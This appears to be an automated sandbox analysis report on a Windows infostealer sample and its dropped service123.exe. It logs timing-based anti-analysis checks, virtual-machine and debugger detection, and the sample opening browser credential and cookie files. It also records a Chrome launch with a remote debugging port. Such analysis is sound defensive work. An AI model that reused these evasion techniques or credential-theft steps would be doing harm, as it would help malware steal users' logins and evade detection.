Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F009C second address: 74F00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F00A0 second address: 74F00A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F00A4 second address: 74F00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0759 second address: 74F075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F075F second address: 74F0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0763 second address: 74F0767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0767 second address: 74F07F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FC69D533906h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 call 00007FC69D5338FEh 0x00000017 mov dx, si 0x0000001a pop eax 0x0000001b pushfd 0x0000001c jmp 00007FC69D533907h 0x00000021 or eax, 2EAE3B3Eh 0x00000027 jmp 00007FC69D533909h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007FC69D5338FEh 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC69D5338FAh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F07F4 second address: 74F0803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752000A second address: 752002B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ch, 22h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC69D533902h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752002B second address: 752002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752002F second address: 7520035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520035 second address: 7520046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520046 second address: 7520086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FC69D533909h 0x00000014 and eax, 0BF9BD46h 0x0000001a jmp 00007FC69D533901h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520086 second address: 75200E5 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, B893h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007FC69CFD56F4h 0x00000013 movzx eax, dx 0x00000016 pop edx 0x00000017 mov edx, esi 0x00000019 popad 0x0000001a and esp, FFFFFFF0h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC69CFD56EBh 0x00000026 or esi, 492629DEh 0x0000002c jmp 00007FC69CFD56F9h 0x00000031 popfd 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75200E5 second address: 7520119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 32A213F0h 0x00000014 call 00007FC69D533909h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520119 second address: 752011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752011F second address: 7520123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520123 second address: 75201B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC69CFD56F2h 0x00000010 sbb si, 2698h 0x00000015 jmp 00007FC69CFD56EBh 0x0000001a popfd 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007FC69CFD56F4h 0x00000024 and cx, D0F8h 0x00000029 jmp 00007FC69CFD56EBh 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007FC69CFD56F9h 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC69CFD56F8h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201B3 second address: 75201B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201B9 second address: 75201BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201BF second address: 75201C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201C3 second address: 752023A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FC69CFD56F0h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FC69CFD56F1h 0x00000018 mov ch, 3Eh 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c jmp 00007FC69CFD56F3h 0x00000021 xchg eax, edi 0x00000022 jmp 00007FC69CFD56F6h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752023A second address: 7520240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520240 second address: 7520297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC69CFD56F6h 0x0000000f mov edi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov eax, 1575902Dh 0x00000018 mov esi, 4CC80229h 0x0000001d popad 0x0000001e mov dword ptr [esp+24h], 00000000h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FC69CFD56F1h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520297 second address: 752029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752029C second address: 75202A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75202A2 second address: 75202A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75202A6 second address: 75202B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock bts dword ptr [edi], 00000000h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ax, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75202B9 second address: 75202BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7530B1C second address: 7530B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1674DBD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1674CF6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 18107F0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 18103C7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 18A37A7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1045
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1465
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1042
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1043
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1449
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1036
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1459
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 2176
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 7823
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\file.exe TID: 6276 Thread sleep count: 1045 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6276 Thread sleep time: -2091045s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep count: 1465 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep time: -2931465s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6220 Thread sleep count: 1042 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6220 Thread sleep time: -2085042s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6240 Thread sleep count: 1043 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6240 Thread sleep time: -2087043s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6416 Thread sleep count: 1449 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6416 Thread sleep time: -2899449s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6472 Thread sleep count: 1036 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6472 Thread sleep time: -2073036s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6420 Thread sleep count: 1459 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6420 Thread sleep time: -2919459s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep count: 205 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep time: -410205s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep count: 2176 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep time: -217600s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep count: 7823 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep time: -782300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2005967665.00000173558EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe Binary or memory string: T8HgFs
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F8230 LoadLibraryA,GetProcAddress,FreeLibrary,PathCchRemoveExtension,GetLastError, 8_2_009F8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_009F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_009F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_009F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_009F13C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1684D0 cpuid 8_2_6C1684D0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 8.2.service123.exe.6c0e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 8000, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP